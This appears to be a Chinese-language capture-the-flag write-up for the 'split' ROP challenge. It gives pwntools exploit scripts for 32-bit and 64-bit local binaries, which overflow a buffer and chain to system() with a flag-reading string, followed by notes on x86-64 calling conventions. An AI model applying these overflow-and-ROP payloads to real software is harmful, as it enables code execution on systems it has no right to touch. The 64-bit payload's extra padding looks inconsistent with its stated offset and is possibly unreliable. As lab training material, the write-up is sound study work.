2_split

32

from pwn import*
#context.log_level = 'debug'
p  = process("./split32")
##p = remote("","")
system_addr = 0x8048657
bin_sh_flag_addr = 0x804A030

payload = 'A'*0x2c
#payload += p32(0)
payload += p32(system_addr)
payload += p32(bin_sh_flag_addr)


p.sendline(payload)
p.interactive()

64位和32位的寄存器和汇编的比较

https://www.jianshu.com/p/9ffad98d7aec

---

1.我们在date段里面找到了，还需要 system，我们在text段里面查找有没有system（xxx），我们只需要system的地址 。找到了system("/bin/ls") 然后地址就得到了。

.data:0000000000601060                 public usefulString
.data:0000000000601060 usefulString    db '/bin/cat flag.txt',0

2.在64的程序里面我们要注意传参的顺序，我们需要一个gadget片段来出入我们的参数。

64

from pwn import*
#context.log_level = 'debug'
p  = process("./split")
#p = remote("","")
pop_rdi_addr = 0x400883
system_addr = 0x400810
bin_sh_flag_addr = 0x601060

payload = 'A'*0x28
payload += p64(0)
payload += p64(pop_rdi_addr)
payload += p64(bin_sh_flag_addr)
payload += p64(system_addr)

p.sendline(payload)
p.interactive()

64位传参

当参数少于7个时， 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
当参数为7个以上时， 前 6 个与前面一样， 但后面的依次从 “右向左” 放入栈中，即和32位汇编一样。

参数个数大于 7 个的时候
H(a, b, c, d, e, f, g, h);
a->%rdi, b->%rsi, c->%rdx, d->%rcx, e->%r8, f->%r9
h->8(%esp)
g->(%esp)
call H